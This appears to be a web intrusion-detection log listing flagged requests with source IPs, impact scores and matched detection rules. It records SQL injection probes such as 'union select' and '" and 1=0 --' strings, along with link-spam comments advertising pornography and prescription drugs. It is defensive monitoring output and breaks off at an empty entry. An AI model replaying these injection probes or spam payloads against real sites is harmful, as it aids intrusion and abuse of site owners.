| ID: | 122773 | | Name: | REQUEST.codeme | | Value: | I have the same., <a href= http://technorati.com/people/hugedildo >Discount huge dildo</a>, [url= http://technorati.com/people/hugedildo ]Discount huge dildo[/url], =-]]], | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 09:05:03 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122774 | | Name: | POST.codeme | | Value: | I have the same., <a href= http://technorati.com/people/hugedildo >Discount huge dildo</a>, [url= http://technorati.com/people/hugedildo ]Discount huge dildo[/url], =-]]], | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 09:05:03 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122771 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 58.187.99.244 | | Impact: | 20 | | Created: | 2010-04-28 08:16:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122772 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 58.187.99.244 | | Impact: | 20 | | Created: | 2010-04-28 08:16:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122769 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 58.187.99.244 | | Impact: | 20 | | Created: | 2010-04-28 08:16:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122770 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 58.187.99.244 | | Impact: | 20 | | Created: | 2010-04-28 08:16:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122767 | | Name: | REQUEST.codeme | | Value: | best for you, <a href= http://technorati.com/people/retroporn#1 >Discount retro porn</a> [url=http://technorati.com/people/retroporn#1]Discount retro porn[/url], 878904, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 08:15:27 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122768 | | Name: | POST.codeme | | Value: | best for you, <a href= http://technorati.com/people/retroporn#1 >Discount retro porn</a> [url=http://technorati.com/people/retroporn#1]Discount retro porn[/url], 878904, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 08:15:27 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122765 | | Name: | REQUEST.codeme | | Value: | Best Wishes, <a href= http://technorati.com/people/homemadesextoys >homemade sex toys free</a>, [url= http://technorati.com/people/homemadesextoys ]homemade sex toys free[/url], :], | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 06:35:21 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122766 | | Name: | POST.codeme | | Value: | Best Wishes, <a href= http://technorati.com/people/homemadesextoys >homemade sex toys free</a>, [url= http://technorati.com/people/homemadesextoys ]homemade sex toys free[/url], :], | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 06:35:21 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122763 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 113.169.121.132 | | Impact: | 20 | | Created: | 2010-04-28 06:32:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122764 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 113.169.121.132 | | Impact: | 20 | | Created: | 2010-04-28 06:32:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122761 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 113.169.121.132 | | Impact: | 20 | | Created: | 2010-04-28 06:32:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122762 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 113.169.121.132 | | Impact: | 20 | | Created: | 2010-04-28 06:32:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122759 | | Name: | REQUEST.codeme | | Value: | Is it so important?, <a href= http://technorati.com/people/hotlesbiansex#1 >hot lesbian sex</a> [url=http://technorati.com/people/hotlesbiansex#1]hot lesbian sex[/url], prwbld, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-28 05:46:00 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122760 | | Name: | POST.codeme | | Value: | Is it so important?, <a href= http://technorati.com/people/hotlesbiansex#1 >hot lesbian sex</a> [url=http://technorati.com/people/hotlesbiansex#1]hot lesbian sex[/url], prwbld, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-28 05:46:00 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122757 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 118.68.165.114 | | Impact: | 20 | | Created: | 2010-04-28 05:23:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122758 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 118.68.165.114 | | Impact: | 20 | | Created: | 2010-04-28 05:23:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122755 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 118.68.165.114 | | Impact: | 20 | | Created: | 2010-04-28 05:23:35 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122756 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 118.68.165.114 | | Impact: | 20 | | Created: | 2010-04-28 05:23:35 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122753 | | Name: | REQUEST.page | | Value: | " | | Page: | /i.php?page=%22 | | IP: | 67.195.111.36 | | Impact: | 12 | | Created: | 2010-04-28 05:06:37 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 122754 | | Name: | GET.page | | Value: | " | | Page: | /i.php?page=%22 | | IP: | 67.195.111.36 | | Impact: | 12 | | Created: | 2010-04-28 05:06:37 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 122751 | | Name: | REQUEST.codeme | | Value: | What?, <a href= http://technorati.com/people/narutoporn#1 >naruto porn free</a> [url=http://technorati.com/people/narutoporn#1]naruto porn free[/url], gphufg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-28 04:56:01 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122752 | | Name: | POST.codeme | | Value: | What?, <a href= http://technorati.com/people/narutoporn#1 >naruto porn free</a> [url=http://technorati.com/people/narutoporn#1]naruto porn free[/url], gphufg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-28 04:56:01 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122749 | | Name: | REQUEST.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.32 | | Impact: | 12 | | Created: | 2010-04-28 04:28:44 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 122750 | | Name: | GET.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.32 | | Impact: | 12 | | Created: | 2010-04-28 04:28:44 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 122747 | | Name: | REQUEST.codeme | | Value: | I have the same., <a href= http://technorati.com/people/sexoasis >sex oasis</a>, [url= http://technorati.com/people/sexoasis ]sex oasis[/url], swox, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 04:06:31 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122748 | | Name: | POST.codeme | | Value: | I have the same., <a href= http://technorati.com/people/sexoasis >sex oasis</a>, [url= http://technorati.com/people/sexoasis ]sex oasis[/url], swox, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 04:06:31 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122745 | | Name: | REQUEST.codeme | | Value: | Real, <a href= http://technorati.com/people/buyphenterminewithoutprescript#1 >buy phentermine without prescription online no hasle</a> [url=http://technorati.com/people/buyphenterminewithoutprescript#1]buy phentermine without prescription online no hasle[/url], 5267, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 03:17:03 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122746 | | Name: | POST.codeme | | Value: | Real, <a href= http://technorati.com/people/buyphenterminewithoutprescript#1 >buy phentermine without prescription online no hasle</a> [url=http://technorati.com/people/buyphenterminewithoutprescript#1]buy phentermine without prescription online no hasle[/url], 5267, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 03:17:03 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122743 | | Name: | REQUEST.page | | Value: | " and 1=0 -- security/localsamcrack2 | | Page: | /i.php?page=%22+and+1=0+--+security/localsamcrack2 | | IP: | 193.226.6.229 | | Impact: | 44 | | Created: | 2010-04-28 02:34:57 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
|
| ID: | 122744 | | Name: | GET.page | | Value: | " and 1=0 -- security/localsamcrack2 | | Page: | /i.php?page=%22+and+1=0+--+security/localsamcrack2 | | IP: | 193.226.6.229 | | Impact: | 44 | | Created: | 2010-04-28 02:34:57 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
|
| ID: | 122741 | | Name: | REQUEST.page | | Value: | |
|